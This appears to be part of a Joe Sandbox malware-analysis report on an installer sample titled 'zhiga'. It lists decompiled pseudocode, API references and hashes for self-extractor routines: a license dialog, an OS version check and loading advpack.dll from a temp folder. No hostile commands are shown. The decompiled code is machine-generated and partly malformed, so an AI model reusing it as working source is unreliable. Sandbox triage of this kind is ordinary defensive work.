                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                        • String ID: Control Panel\Desktop\ResourceLocale
                                                                        • API String ID: 3346862599-1109908249
                                                                        • Opcode ID: 63292bd12a7d01b1a19ff9d36df6a02092d7f4ef4ff2bb8df984a6fff1e343d3
                                                                        • Instruction ID: 5e4cdcefcdd49df0254a7cd117f3542546a212dab8753b31df69f90f0481b5ef
                                                                        • Opcode Fuzzy Hash: 63292bd12a7d01b1a19ff9d36df6a02092d7f4ef4ff2bb8df984a6fff1e343d3
                                                                        • Instruction Fuzzy Hash: 2E313C31E00228DFDB31AB51DD45BEAB7B9EB45778F0001A5E949E6180DB309E86EF52
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F83A3F(void* __eflags) {
                                                                        				void* _t3;
                                                                        				void* _t9;
                                                                        				CHAR* _t16;
                                                                        
                                                                        				_t16 = "LICENSE";
                                                                        				_t1 = E00F8468F(_t16, 0, 0) + 1; // 0x1
                                                                        				_t3 = LocalAlloc(0x40, _t1);
                                                                        				 *0xf88d4c = _t3;
                                                                        				if(_t3 != 0) {
                                                                        					_t19 = _t16;
                                                                        					if(E00F8468F(_t16, _t3, _t28) != 0) {
                                                                        						if(lstrcmpA( *0xf88d4c, "<None>") == 0) {
                                                                        							LocalFree( *0xf88d4c);
                                                                        							L9:
                                                                        							 *0xf89124 = 0;
                                                                        							return 1;
                                                                        						}
                                                                        						_t9 = E00F86517(_t19, 0x7d1, 0, E00F83100, 0, 0);
                                                                        						LocalFree( *0xf88d4c);
                                                                        						if(_t9 != 0) {
                                                                        							goto L9;
                                                                        						}
                                                                        						 *0xf89124 = 0x800704c7;
                                                                        						L2:
                                                                        						return 0;
                                                                        					}
                                                                        					E00F844B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                        					LocalFree( *0xf88d4c);
                                                                        					 *0xf89124 = 0x80070714;
                                                                        					goto L2;
                                                                        				}
                                                                        				E00F844B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                        				 *0xf89124 = E00F86285();
                                                                        				goto L2;
                                                                        			}






                                                                        0x00f83a46
                                                                        0x00f83a57
                                                                        0x00f83a5d
                                                                        0x00f83a63
                                                                        0x00f83a6a
                                                                        0x00f83a91
                                                                        0x00f83a9a
                                                                        0x00f83ad8
                                                                        0x00f83b13
                                                                        0x00f83b19
                                                                        0x00f83b1b
                                                                        0x00000000
                                                                        0x00f83b21
                                                                        0x00f83ae7
                                                                        0x00f83af4
                                                                        0x00f83afc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f83afe
                                                                        0x00f83a87
                                                                        0x00000000
                                                                        0x00f83a87
                                                                        0x00f83aa8
                                                                        0x00f83ab3
                                                                        0x00f83ab9
                                                                        0x00000000
                                                                        0x00f83ab9
                                                                        0x00f83a78
                                                                        0x00f83a82
                                                                        0x00000000

                                                                        APIs
                                                                          • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846A0
                                                                          • Part of subcall function 00F8468F: SizeofResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846A9
                                                                          • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846C3
                                                                          • Part of subcall function 00F8468F: LoadResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846CC
                                                                          • Part of subcall function 00F8468F: LockResource.KERNEL32(00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846D3
                                                                          • Part of subcall function 00F8468F: memcpy_s.MSVCRT ref: 00F846E5
                                                                          • Part of subcall function 00F8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846EF
                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00F82F64,?,00000002,00000000), ref: 00F83A5D
                                                                        • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00F83AB3
                                                                          • Part of subcall function 00F844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F84518
                                                                          • Part of subcall function 00F844B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 00F84554
                                                                          • Part of subcall function 00F86285: GetLastError.KERNEL32(00F85BBC), ref: 00F86285
                                                                        • lstrcmpA.KERNEL32(<None>,00000000), ref: 00F83AD0
                                                                        • LocalFree.KERNEL32 ref: 00F83B13
                                                                          • Part of subcall function 00F86517: FindResourceA.KERNEL32(00F80000,000007D6,00000005), ref: 00F8652A
                                                                          • Part of subcall function 00F86517: LoadResource.KERNEL32(00F80000,00000000,?,?,00F82EE8,00000000,00F819E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00F86538
                                                                          • Part of subcall function 00F86517: DialogBoxIndirectParamA.USER32(00F80000,00000000,00000547,00F819E0,00000000), ref: 00F86557
                                                                          • Part of subcall function 00F86517: FreeResource.KERNEL32(00000000,?,?,00F82EE8,00000000,00F819E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00F86560
                                                                        • LocalFree.KERNEL32(00000000,00F83100,00000000,00000000), ref: 00F83AF4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                        • String ID: <None>$LICENSE
                                                                        • API String ID: 2414642746-383193767
                                                                        • Opcode ID: 406b4e378b7158b032ef692b86b51c349143a542b2ab3f86b1b221eb43cd2b28
                                                                        • Instruction ID: 6a8943fccb5941db224efa4346a7741be0122548405fb68394f72c7b7cbc4e2e
                                                                        • Opcode Fuzzy Hash: 406b4e378b7158b032ef692b86b51c349143a542b2ab3f86b1b221eb43cd2b28
                                                                        • Instruction Fuzzy Hash: 2611D672704205ABD724BF729C0DFF779B9EBD5B50B10412EB541DA1B1EABD9802B720
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E00F824E0(void* __ebx) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t7;
                                                                        				void* _t20;
                                                                        				long _t26;
                                                                        				signed int _t27;
                                                                        
                                                                        				_t20 = __ebx;
                                                                        				_t7 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t7 ^ _t27;
                                                                        				_t25 = 0x104;
                                                                        				_t26 = 0;
                                                                        				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                        					E00F8658A( &_v268, 0x104, "wininit.ini");
                                                                        					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                        					_t25 = _lopen( &_v268, 0x40);
                                                                        					if(_t25 != 0xffffffff) {
                                                                        						_t26 = _llseek(_t25, 0, 2);
                                                                        						_lclose(_t25);
                                                                        					}
                                                                        				}
                                                                        				return E00F86CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                        			}











                                                                        0x00f824e0
                                                                        0x00f824eb
                                                                        0x00f824f2
                                                                        0x00f824f7
                                                                        0x00f82504
                                                                        0x00f8250e
                                                                        0x00f8251d
                                                                        0x00f8252c
                                                                        0x00f82541
                                                                        0x00f82546
                                                                        0x00f82553
                                                                        0x00f82555
                                                                        0x00f82555
                                                                        0x00f82546
                                                                        0x00f8256c

                                                                        APIs
                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00F82506
                                                                        • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00F8252C
                                                                        • _lopen.KERNEL32(?,00000040), ref: 00F8253B
                                                                        • _llseek.KERNEL32(00000000,00000000,00000002), ref: 00F8254C
                                                                        • _lclose.KERNEL32(00000000), ref: 00F82555
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                        • String ID: wininit.ini
                                                                        • API String ID: 3273605193-4206010578
                                                                        • Opcode ID: dc81203c369446bbc4cd6c1a2683949f007b9022488b1e5f08c39ce59561e621
                                                                        • Instruction ID: 332e8665e8469580608c41832836f5eab2903e12a3eb633747f354da73c673ee
                                                                        • Opcode Fuzzy Hash: dc81203c369446bbc4cd6c1a2683949f007b9022488b1e5f08c39ce59561e621
                                                                        • Instruction Fuzzy Hash: 7E01B532A0011867D720AB65DC0CEEF7B7CEB45760F040155FA49D7190DE749E46DB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 75%
                                                                        			E00F836EE(CHAR* __ecx) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				struct _OSVERSIONINFOA _v416;
                                                                        				signed int _v420;
                                                                        				signed int _v424;
                                                                        				CHAR* _v428;
                                                                        				CHAR* _v432;
                                                                        				signed int _v436;
                                                                        				CHAR* _v440;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t72;
                                                                        				CHAR* _t77;
                                                                        				CHAR* _t91;
                                                                        				CHAR* _t94;
                                                                        				int _t97;
                                                                        				CHAR* _t98;
                                                                        				signed char _t99;
                                                                        				CHAR* _t104;
                                                                        				signed short _t107;
                                                                        				signed int _t109;
                                                                        				short _t113;
                                                                        				void* _t114;
                                                                        				signed char _t115;
                                                                        				short _t119;
                                                                        				CHAR* _t123;
                                                                        				CHAR* _t124;
                                                                        				CHAR* _t129;
                                                                        				signed int _t131;
                                                                        				signed int _t132;
                                                                        				CHAR* _t135;
                                                                        				CHAR* _t138;
                                                                        				signed int _t139;
                                                                        
                                                                        				_t72 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t72 ^ _t139;
                                                                        				_v416.dwOSVersionInfoSize = 0x94;
                                                                        				_t115 = __ecx;
                                                                        				_t135 = 0;
                                                                        				_v432 = __ecx;
                                                                        				_t138 = 0;
                                                                        				if(GetVersionExA( &_v416) != 0) {
                                                                        					_t133 = _v416.dwMajorVersion;
                                                                        					_t119 = 2;
                                                                        					_t77 = _v416.dwPlatformId - 1;
                                                                        					__eflags = _t77;
                                                                        					if(_t77 == 0) {
                                                                        						_t119 = 0;
                                                                        						__eflags = 1;
                                                                        						 *0xf88184 = 1;
                                                                        						 *0xf88180 = 1;
                                                                        						L13:
                                                                        						 *0xf89a40 = _t119;
                                                                        						L14:
                                                                        						__eflags =  *0xf88a34 - _t138; // 0x0
                                                                        						if(__eflags != 0) {
                                                                        							goto L66;
                                                                        						}
                                                                        						__eflags = _t115;
                                                                        						if(_t115 == 0) {
                                                                        							goto L66;
                                                                        						}
                                                                        						_v428 = _t135;
                                                                        						__eflags = _t119;
                                                                        						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                        						_t11 =  &_v420;
                                                                        						 *_t11 = _v420 & _t138;
                                                                        						__eflags =  *_t11;
                                                                        						_v440 = _t115;
                                                                        						do {
                                                                        							_v424 = _t135 * 0x18;
                                                                        							_v436 = E00F82A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                        							_t91 = E00F82A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                        							_t123 = _v436;
                                                                        							_t133 = 0x54d;
                                                                        							__eflags = _t123;
                                                                        							if(_t123 < 0) {
                                                                        								L32:
                                                                        								__eflags = _v420 - 1;
                                                                        								if(_v420 == 1) {
                                                                        									_t138 = 0x54c;
                                                                        									L36:
                                                                        									__eflags = _t138;
                                                                        									if(_t138 != 0) {
                                                                        										L40:
                                                                        										__eflags = _t138 - _t133;
                                                                        										if(_t138 == _t133) {
                                                                        											L30:
                                                                        											_v420 = _v420 & 0x00000000;
                                                                        											_t115 = 0;
                                                                        											_v436 = _v436 & 0x00000000;
                                                                        											__eflags = _t138 - _t133;
                                                                        											_t133 = _v432;
                                                                        											if(__eflags != 0) {
                                                                        												_t124 = _v440;
                                                                        											} else {
                                                                        												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                        												_v420 =  &_v268;
                                                                        											}
                                                                        											__eflags = _t124;
                                                                        											if(_t124 == 0) {
                                                                        												_t135 = _v436;
                                                                        											} else {
                                                                        												_t99 = _t124[0x30];
                                                                        												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                        												__eflags = _t99 & 0x00000001;
                                                                        												if((_t99 & 0x00000001) == 0) {
                                                                        													asm("sbb ebx, ebx");
                                                                        													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                        												} else {
                                                                        													_t115 = 0x104;
                                                                        												}
                                                                        											}
                                                                        											__eflags =  *0xf88a38 & 0x00000001;
                                                                        											if(( *0xf88a38 & 0x00000001) != 0) {
                                                                        												L64:
                                                                        												_push(0);
                                                                        												_push(0x30);
                                                                        												_push(_v420);
                                                                        												_push("zhiga");
                                                                        												goto L65;
                                                                        											} else {
                                                                        												__eflags = _t135;
                                                                        												if(_t135 == 0) {
                                                                        													goto L64;
                                                                        												}
                                                                        												__eflags =  *_t135;
                                                                        												if( *_t135 == 0) {
                                                                        													goto L64;
                                                                        												}
                                                                        												MessageBeep(0);
                                                                        												_t94 = E00F8681F(_t115);
                                                                        												__eflags = _t94;
                                                                        												if(_t94 == 0) {
                                                                        													L57:
                                                                        													0x180030 = 0x30;
                                                                        													L58:
                                                                        													_t97 = MessageBoxA(0, _t135, "zhiga", 0x00180030 | _t115);
                                                                        													__eflags = _t115 & 0x00000004;
                                                                        													if((_t115 & 0x00000004) == 0) {
                                                                        														__eflags = _t115 & 0x00000001;
                                                                        														if((_t115 & 0x00000001) == 0) {
                                                                        															goto L66;
                                                                        														}
                                                                        														__eflags = _t97 - 1;
                                                                        														L62:
                                                                        														if(__eflags == 0) {
                                                                        															_t138 = 0;
                                                                        														}
                                                                        														goto L66;
                                                                        													}
                                                                        													__eflags = _t97 - 6;
                                                                        													goto L62;
                                                                        												}
                                                                        												_t98 = E00F867C9(_t124, _t124);
                                                                        												__eflags = _t98;
                                                                        												if(_t98 == 0) {
                                                                        													goto L57;
                                                                        												}
                                                                        												goto L58;
                                                                        											}
                                                                        										}
                                                                        										__eflags = _t138 - 0x54c;
                                                                        										if(_t138 == 0x54c) {
                                                                        											goto L30;
                                                                        										}
                                                                        										__eflags = _t138;
                                                                        										if(_t138 == 0) {
                                                                        											goto L66;
                                                                        										}
                                                                        										_t135 = 0;
                                                                        										__eflags = 0;
                                                                        										goto L44;
                                                                        									}
                                                                        									L37:
                                                                        									_t129 = _v432;
                                                                        									__eflags = _t129[0x7c];
                                                                        									if(_t129[0x7c] == 0) {
                                                                        										goto L66;
                                                                        									}
                                                                        									_t133 =  &_v268;
                                                                        									_t104 = E00F828E8(_t129,  &_v268, _t129,  &_v428);
                                                                        									__eflags = _t104;
                                                                        									if(_t104 != 0) {
                                                                        										goto L66;
                                                                        									}
                                                                        									_t135 = _v428;
                                                                        									_t133 = 0x54d;
                                                                        									_t138 = 0x54d;
                                                                        									goto L40;
                                                                        								}
                                                                        								goto L33;
                                                                        							}
                                                                        							__eflags = _t91;
                                                                        							if(_t91 > 0) {
                                                                        								goto L32;
                                                                        							}
                                                                        							__eflags = _t123;
                                                                        							if(_t123 != 0) {
                                                                        								__eflags = _t91;
                                                                        								if(_t91 != 0) {
                                                                        									goto L37;
                                                                        								}
                                                                        								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                        								L27:
                                                                        								if(__eflags <= 0) {
                                                                        									goto L37;
                                                                        								}
                                                                        								L28:
                                                                        								__eflags = _t135;
                                                                        								if(_t135 == 0) {
                                                                        									goto L33;
                                                                        								}
                                                                        								_t138 = 0x54c;
                                                                        								goto L30;
                                                                        							}
                                                                        							__eflags = _t91;
                                                                        							_t107 = _v416.dwBuildNumber;
                                                                        							if(_t91 != 0) {
                                                                        								_t131 = _v424;
                                                                        								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                        								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                        									goto L37;
                                                                        								}
                                                                        								goto L28;
                                                                        							}
                                                                        							_t132 = _t107 & 0x0000ffff;
                                                                        							_t109 = _v424;
                                                                        							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                        							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                        								goto L28;
                                                                        							}
                                                                        							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                        							goto L27;
                                                                        							L33:
                                                                        							_t135 =  &(_t135[1]);
                                                                        							_v428 = _t135;
                                                                        							_v420 = _t135;
                                                                        							__eflags = _t135 - 2;
                                                                        						} while (_t135 < 2);
                                                                        						goto L36;
                                                                        					}
                                                                        					__eflags = _t77 == 1;
                                                                        					if(_t77 == 1) {
                                                                        						 *0xf89a40 = _t119;
                                                                        						 *0xf88184 = 1;
                                                                        						 *0xf88180 = 1;
                                                                        						__eflags = _t133 - 3;
                                                                        						if(_t133 > 3) {
                                                                        							__eflags = _t133 - 5;
                                                                        							if(_t133 < 5) {
                                                                        								goto L14;
                                                                        							}
                                                                        							_t113 = 3;
                                                                        							_t119 = _t113;
                                                                        							goto L13;
                                                                        						}
                                                                        						_t119 = 1;
                                                                        						_t114 = 3;
                                                                        						 *0xf89a40 = 1;
                                                                        						__eflags = _t133 - _t114;
                                                                        						if(__eflags < 0) {
                                                                        							L9:
                                                                        							 *0xf88184 = _t135;
                                                                        							 *0xf88180 = _t135;
                                                                        							goto L14;
                                                                        						}
                                                                        						if(__eflags != 0) {
                                                                        							goto L14;
                                                                        						}
                                                                        						__eflags = _v416.dwMinorVersion - 0x33;
                                                                        						if(_v416.dwMinorVersion >= 0x33) {
                                                                        							goto L14;
                                                                        						}
                                                                        						goto L9;
                                                                        					}
                                                                        					_t138 = 0x4ca;
                                                                        					goto L44;
                                                                        				} else {
                                                                        					_t138 = 0x4b4;
                                                                        					L44:
                                                                        					_push(_t135);
                                                                        					_push(0x10);
                                                                        					_push(_t135);
                                                                        					_push(_t135);
                                                                        					L65:
                                                                        					_t133 = _t138;
                                                                        					E00F844B9(0, _t138);
                                                                        					L66:
                                                                        					return E00F86CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                        				}
                                                                        			}





































                                                                        0x00f836f9
                                                                        0x00f83700
                                                                        0x00f8370c
                                                                        0x00f83716
                                                                        0x00f83718
                                                                        0x00f8371b
                                                                        0x00f83721
                                                                        0x00f8372b
                                                                        0x00f8373d
                                                                        0x00f83745
                                                                        0x00f83746
                                                                        0x00f83746
                                                                        0x00f83749
                                                                        0x00f837ab
                                                                        0x00f837ad
                                                                        0x00f837ae
                                                                        0x00f837b3
                                                                        0x00f837b8
                                                                        0x00f837b8
                                                                        0x00f837bf
                                                                        0x00f837bf
                                                                        0x00f837c5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f837cb
                                                                        0x00f837cd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f837d5
                                                                        0x00f837db
                                                                        0x00f837e8
                                                                        0x00f837ea
                                                                        0x00f837ea
                                                                        0x00f837ea
                                                                        0x00f837f0
                                                                        0x00f837f6
                                                                        0x00f83805
                                                                        0x00f83817
                                                                        0x00f8382b
                                                                        0x00f83830
                                                                        0x00f83836
                                                                        0x00f8383b
                                                                        0x00f8383d
                                                                        0x00f838eb
                                                                        0x00f838eb
                                                                        0x00f838f2
                                                                        0x00f8390c
                                                                        0x00f83911
                                                                        0x00f83911
                                                                        0x00f83913
                                                                        0x00f8394d
                                                                        0x00f8394d
                                                                        0x00f8394f
                                                                        0x00f838a9
                                                                        0x00f838a9
                                                                        0x00f838b0
                                                                        0x00f838b2
                                                                        0x00f838b9
                                                                        0x00f838bb
                                                                        0x00f838c1
                                                                        0x00f83975
                                                                        0x00f838c7
                                                                        0x00f838de
                                                                        0x00f838e0
                                                                        0x00f838e0
                                                                        0x00f8397b
                                                                        0x00f8397d
                                                                        0x00f839a9
                                                                        0x00f8397f
                                                                        0x00f83982
                                                                        0x00f8398b
                                                                        0x00f8398d
                                                                        0x00f8398f
                                                                        0x00f8399f
                                                                        0x00f839a1
                                                                        0x00f83991
                                                                        0x00f83991
                                                                        0x00f83991
                                                                        0x00f8398f
                                                                        0x00f839af
                                                                        0x00f839b6
                                                                        0x00f83a0f
                                                                        0x00f83a0f
                                                                        0x00f83a11
                                                                        0x00f83a13
                                                                        0x00f83a19
                                                                        0x00000000
                                                                        0x00f839b8
                                                                        0x00f839b8
                                                                        0x00f839ba
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f839bc
                                                                        0x00f839bf
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f839c3
                                                                        0x00f839c9
                                                                        0x00f839ce
                                                                        0x00f839d0
                                                                        0x00f839e3
                                                                        0x00f839e5
                                                                        0x00f839e6
                                                                        0x00f839f1
                                                                        0x00f839f7
                                                                        0x00f839fa
                                                                        0x00f83a01
                                                                        0x00f83a04
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f83a06
                                                                        0x00f83a09
                                                                        0x00f83a09
                                                                        0x00f83a0b
                                                                        0x00f83a0b
                                                                        0x00000000
                                                                        0x00f83a09
                                                                        0x00f839fc
                                                                        0x00000000
                                                                        0x00f839fc
                                                                        0x00f839d3
                                                                        0x00f839d8
                                                                        0x00f839da
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f839dc
                                                                        0x00f839b6
                                                                        0x00f83955
                                                                        0x00f8395b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f83961
                                                                        0x00f83963
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f83969
                                                                        0x00f83969
                                                                        0x00000000
                                                                        0x00f83969
                                                                        0x00f83915
                                                                        0x00f83915
                                                                        0x00f8391b
                                                                        0x00f8391f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f8392d
                                                                        0x00f83933
                                                                        0x00f83938
                                                                        0x00f8393a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f83940
                                                                        0x00f83946
                                                                        0x00f8394b
                                                                        0x00000000
                                                                        0x00f8394b
                                                                        0x00000000
                                                                        0x00f838f2
                                                                        0x00f83843
                                                                        0x00f83845
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f8384b
                                                                        0x00f8384d
                                                                        0x00f83883
                                                                        0x00f83885
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f8389a
                                                                        0x00f8389e
                                                                        0x00f8389e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f838a0
                                                                        0x00f838a0
                                                                        0x00f838a2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f838a4
                                                                        0x00000000
                                                                        0x00f838a4
                                                                        0x00f8384f
                                                                        0x00f83851
                                                                        0x00f83857
                                                                        0x00f8386e
                                                                        0x00f83877
                                                                        0x00f8387b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f83881
                                                                        0x00f83859
                                                                        0x00f8385c
                                                                        0x00f83862
                                                                        0x00f83866
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f83868
                                                                        0x00000000
                                                                        0x00f838f4
                                                                        0x00f838f4
                                                                        0x00f838f5
                                                                        0x00f838fb
                                                                        0x00f83901
                                                                        0x00f83901
                                                                        0x00000000
                                                                        0x00f8390a
                                                                        0x00f8374b
                                                                        0x00f8374e
                                                                        0x00f8375c
                                                                        0x00f83764
                                                                        0x00f83769
                                                                        0x00f8376e
                                                                        0x00f83771
                                                                        0x00f8379c
                                                                        0x00f8379f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f837a3
                                                                        0x00f837a4
                                                                        0x00000000
                                                                        0x00f837a4
                                                                        0x00f83773
                                                                        0x00f83777
                                                                        0x00f83778
                                                                        0x00f8377f
                                                                        0x00f83781
                                                                        0x00f8378e
                                                                        0x00f8378e
                                                                        0x00f83794
                                                                        0x00000000
                                                                        0x00f83794
                                                                        0x00f83783
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f83785
                                                                        0x00f8378c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f8378c
                                                                        0x00f83750
                                                                        0x00000000
                                                                        0x00f8372d
                                                                        0x00f8372d
                                                                        0x00f8396b
                                                                        0x00f8396b
                                                                        0x00f8396c
                                                                        0x00f8396e
                                                                        0x00f8396f
                                                                        0x00f83a1e
                                                                        0x00f83a1e
                                                                        0x00f83a22
                                                                        0x00f83a27
                                                                        0x00f83a3e
                                                                        0x00f83a3e

                                                                        APIs
                                                                        • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00F83723
                                                                        • MessageBeep.USER32(00000000), ref: 00F839C3
                                                                        • MessageBoxA.USER32(00000000,00000000,zhiga,00000030), ref: 00F839F1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Message$BeepVersion
                                                                        • String ID: 3$zhiga
                                                                        • API String ID: 2519184315-2183486482
                                                                        • Opcode ID: bc4ea0b4fdbae60a60ef70d81da975e87d2377fba5bf0ec79ae39892cb604d23
                                                                        • Instruction ID: a84a42f266a296e942f95631901a245c3bf68cd370f64b860fa3b22ee86448d4
                                                                        • Opcode Fuzzy Hash: bc4ea0b4fdbae60a60ef70d81da975e87d2377fba5bf0ec79ae39892cb604d23
                                                                        • Instruction Fuzzy Hash: 8991E472F052249BDB38AA14CC817FA77A1EB45B14F1500A9D88997261DB788F81FB41
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 83%
                                                                        			E00F86495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __edi;
                                                                        				signed int _t9;
                                                                        				signed char _t14;
                                                                        				struct HINSTANCE__* _t15;
                                                                        				void* _t18;
                                                                        				CHAR* _t26;
                                                                        				void* _t27;
                                                                        				signed int _t28;
                                                                        
                                                                        				_t27 = __esi;
                                                                        				_t18 = __ebx;
                                                                        				_t9 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t9 ^ _t28;
                                                                        				_push(__ecx);
                                                                        				E00F81781( &_v268, 0x104, __ecx, "C:\Users\FRONTD~1\AppData\Local\Temp\IXP001.TMP\");
                                                                        				_t26 = "advpack.dll";
                                                                        				E00F8658A( &_v268, 0x104, _t26);
                                                                        				_t14 = GetFileAttributesA( &_v268);
                                                                        				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                        					_t15 = LoadLibraryA(_t26);
                                                                        				} else {
                                                                        					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                        				}
                                                                        				return E00F86CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                        			}













                                                                        0x00f86495
                                                                        0x00f86495
                                                                        0x00f864a0
                                                                        0x00f864a7
                                                                        0x00f864ab
                                                                        0x00f864bd
